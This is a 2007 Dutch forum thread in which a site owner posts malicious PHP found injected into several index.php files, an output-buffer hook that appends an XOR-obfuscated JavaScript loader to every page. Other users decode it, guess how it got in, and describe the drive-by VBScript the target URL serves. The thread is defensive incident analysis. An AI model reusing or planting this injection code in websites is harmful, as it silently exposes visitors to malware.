[PHP] phpfake hack? - Privacy en beveiliging

donderdag 23 augustus 2007 10:14

Acties:

Verwijderd

Topicstarter

Hallo,

Ik heb nu in een week tijd 3 sites gehad die het ineens niet meer deden..

in de index.php bestanden stond ineens:

code:

<?
ob_start("phpfake");
php
//Rest van de code

En onderin staat:

<?php
function phpfake($buffer)
{
  $Exp='<script language="JavaScript">e = \'0x00\' + \'6E\';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp=\'\';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>';
  return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

De hosteigenaar (een vriend van me) zegt dat ik gehacked ben. Lijkt er wel op!

Weet iemand wat dit voor hack is? Is niks over te vinden op internet. Of wat hij doet met die javascript? Lijkt erop dat hij iets onderin de body print, en tegen meekijkers, het in de code in charcodes heeft staan. Leuke is wel dat door de verkeerde implementatie bovenin, de hack het niet doet en de site gewoon een foutmelding geeft

[ Voor 0% gewijzigd door een moderator op 06-09-2007 13:10 . Reden: Code-tags toegevoegd ]

donderdag 23 augustus 2007 10:18

Acties:

AW_Bos

Liefhebber van nostalgie... 🕰️

Als ik str1 door un escape haal die ik allemaal blokjes-characters??

En draait je nog bepaalde software zoals Joomla, phpBB of Wordpress welke niet up2date is?

[ Voor 22% gewijzigd door AW_Bos op 23-08-2007 10:20 ]

☎ Telecommunicatie van vroeger
🚅Alles over spoor en treintjes

donderdag 23 augustus 2007 10:22

Acties:

Verwijderd

Topicstarter

Ariën Clay schreef op donderdag 23 augustus 2007 @ 10:18:
Als ik str1 door un escape haal die ik allemaal blokjes-characters??

En draait je nog bepaalde software zoals Joomla, phpBB of Wordpress welke niet up2date is?

Nee geen van dat alles.

PHP, met mysql DB's en Plesk 8.1.0

donderdag 23 augustus 2007 10:23

Acties:

SeatRider

Hips don't lie

Verwijderd schreef op donderdag 23 augustus 2007 @ 10:14:
Weet iemand wat dit voor hack is? Is niks over te vinden op internet.

Eerste pagina op Google: http://forum.dutchjoomla....orndomainskensoornlp.html

Nederlands is makkelijker als je denkt

donderdag 23 augustus 2007 10:24

Acties:

AW_Bos

Liefhebber van nostalgie... 🕰️

Waarschijnlijk gebruikt iemand op die webserver een Joomla CMS pakket die niet echt up2date is.

Ik las net op Google dat iemand door de onbenullige manier van het starten van de PHPcode zomaar een parse-error kreeg

... En die gebruikte een Joomla CMS.

☎ Telecommunicatie van vroeger
🚅Alles over spoor en treintjes

donderdag 23 augustus 2007 10:27

Acties:

NMe

Quia Ego Sic Dico.

Dit lijkt me weinig tot niets met programmeren te maken te hebben. Een move naar Beveiliging & Virussen lijkt me dan ook op zijn plaats.

PRG>>BV

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

donderdag 23 augustus 2007 10:30

Acties:

Verwijderd

Topicstarter

SeatRider schreef op donderdag 23 augustus 2007 @ 10:23:
[...]

Eerste pagina op Google: http://forum.dutchjoomla....orndomainskensoornlp.html

Ja die had ik ook gevonden. Maar daar heb ik niet zoveel aan.

Lekker als iemand anders met joomla ervoor zorgt dat mijn site verneukt raakt zeg! Slecht beveiligd dan.

donderdag 23 augustus 2007 10:33

Acties:

DataGhost

iPL dev

Ariën Clay schreef op donderdag 23 augustus 2007 @ 10:18:
Als ik str1 door un escape haal die ik allemaal blokjes-characters??

En draait je nog bepaalde software zoals Joomla, phpBB of Wordpress welke niet up2date is?

^ is volgens mij xor, het wordt dus xorred met 0x006E. Ik krijg dan een stel letters met een hoop accenten, ziet eruit als russisch in ASCII ofzo. In elk geval iets met unicode oid

donderdag 23 augustus 2007 10:33

Acties:

Janoz

Moderator Devschuur®

!litemod

Grappig. De hack is slecht gemaakt. Hij houdt er geen rekening mee dat niet iedereen de shorttags gebruikt. Deze hack gaat waarschijnlijk wel werken op een site waar de <? versie gebruikt wordt en de gebruiker zal het nauwlijks merken. Ik ben trouwens erg benieuwd wat het stukje javascript doet.

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

donderdag 23 augustus 2007 10:34

Acties:

Dennahz

Life feels like hell should.

Verwijderd schreef op donderdag 23 augustus 2007 @ 10:30:
[...]

Ja die had ik ook gevonden. Maar daar heb ik niet zoveel aan.

Lekker als iemand anders met joomla ervoor zorgt dat mijn site verneukt raakt zeg! Slecht beveiligd dan.

Slecht beveiligd op de server, ja. Normaal gezien zou er geen eens toegang mogen zijn tot jouw mapje op de server.

Twitter

donderdag 23 augustus 2007 10:39

Acties:

DataGhost

iPL dev

Janoz schreef op donderdag 23 augustus 2007 @ 10:33:
Grappig. De hack is slecht gemaakt. Hij houdt er geen rekening mee dat niet iedereen de shorttags gebruikt. Deze hack gaat waarschijnlijk wel werken op een site waar de <? versie gebruikt wordt en de gebruiker zal het nauwlijks merken. Ik ben trouwens erg benieuwd wat het stukje javascript doet.

Afbeeldingslocatie: http://stack.dataghost.com/phpfake.png

Ik post het maar als plaatje, geen idee wat de tekens verder betekenen. Meer kan ik er niet uit opmaken (of ik heb de JS verkeerd gelezen)

edit: plaatje aangepast, ik bedacht me dat het niet voor niets 0x006E was in plaats van 0x6E. Daarom even per 2 bytes xor gedaan. Het mocht helaas niet baten, ik heb nog geen flauw idee wat het betekent. Het kan ook zijn dat ik ergens een foutje heb gemaakt ofzo, komt omdat ik nu even niet zoveel tijd heb

Verwijderd schreef op donderdag 23 augustus 2007 @ 10:41:
Als ik google op PHPFAKE kom ik bijzonder veel arabische sites tegen (of wat voor raar taaltje het ook is) dus het zou kunnen dat het die taal als doel heeft eigenlijk.

Dat zou ook kunnen, ik heb nog geen arabische tekens op mijn computer gezien, buiten plaatjes om. Dat zou verklaren waarom ik geen 'leesbare' tekens krijg.

edit: laat maar weer, net even gegoogled op phpfake en ik heb wel arabische fonts

Trouwens, verder over die hack... een document.write doet volgens mij een volledige rewrite van het document, in ieder geval als de rest van het document er niet mee is opgebouwd. Lijkt me dus een heel simpel volledige-pagina-overschrijf-functie die hoopt dat ie niet makkelijk gevonden wordt.

edit_zoveel:

Ik had iets over het hoofd gezien, er moest nog 127 vanaf gehaald, hoe simpel

Anyway, het lijkt zo in eerste instantie op een soort van phone-home ding, zo van 'kijk, dit board is gehackt en deze user zit erop'

[ Voor 56% gewijzigd door DataGhost op 23-08-2007 10:59 ]

donderdag 23 augustus 2007 10:41

Acties:

Verwijderd

Topicstarter

Als ik google op PHPFAKE kom ik bijzonder veel arabische sites tegen (of wat voor raar taaltje het ook is) dus het zou kunnen dat het die taal als doel heeft eigenlijk.

donderdag 23 augustus 2007 11:26

Acties:

Janoz

Moderator Devschuur®

!litemod

een document.write doet volgens mij een volledige rewrite

Nee, dat doet hij niet. Het enige dat dit script doet is zelf de output opvangen en vervolgens alles wegschrijven en vlak voor het einde van de pagina eigen content toevoegen.

De pagina blijft gewoon verder werken. Er zouden alleen problemen optreden op het moment dat er dus een andere phptag gebruikt werd, en volgens mij zouden er ook problemen op kunnen treden als de gebruiker zelf output buffering zou gebruiken.

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

donderdag 23 augustus 2007 11:38

Acties:

DataGhost

iPL dev

Janoz schreef op donderdag 23 augustus 2007 @ 11:26:
[...]

Nee, dat doet hij niet. Het enige dat dit script doet is zelf de output opvangen en vervolgens alles wegschrijven en vlak voor het einde van de pagina eigen content toevoegen.

Mja, laatste keer dat ik het probeerde was dat wel het geval, maar ik weet de context niet meer

De gedachte was ook nog van voordat ik precies wist wat het was en dus nog dacht dat het een <insert taal>talige tekst was, dan leek het me logisch de content te overschrijven met de boodschap

donderdag 23 augustus 2007 15:36

Acties:

sh4d0wman

Attack | Exploit | Pwn

zelfde als deze, of niet?? Virus op website?

This signature has been taken down by the Dutch police in the course of an international lawenforcement operation.

donderdag 6 september 2007 11:55

Acties:

Verwijderd

Aanvulling:

http://secubox.aldria.com/topic-1498.html

Het lijkt dus een website die te maken heeft met het betreffende virus en is waarschijnlijk om het virus te verspreiden.

De URL van het virus is al een tijdje offline dus ik denk niet dat het virus verder nog heel veel kwaad kan.

donderdag 6 september 2007 12:00

Acties:

Alex)

Verwijderd schreef op donderdag 06 september 2007 @ 11:55:
Aanvulling:

http://secubox.aldria.com/topic-1498.html

Het lijkt dus een website die te maken heeft met het betreffende virus en is waarschijnlijk om het virus te verspreiden.

De URL van het virus is al een tijdje offline dus ik denk niet dat het virus verder nog heel veel kwaad kan.

Hmm, als ik naar de URL in het plaatje surf krijg ik een 404, maar wel van IE de vraag of ik Microsoft's "Remote Data Services Data Control" wil laten uitvoeren...

In de source staat wat VBScript met o.a. verwijzingen naar Shell.Application, dus het doet wel iets, maar wat? Ik zie ook verwijzingen naar een XMLHTTPObject en Scripting.FileSystemObject...

[ Voor 5% gewijzigd door Alex) op 06-09-2007 12:01 ]

We are shaping the future

donderdag 6 september 2007 12:07

Acties:

Verwijderd

Hmmm het linkje is dus nog wel actief en gevaarlijk.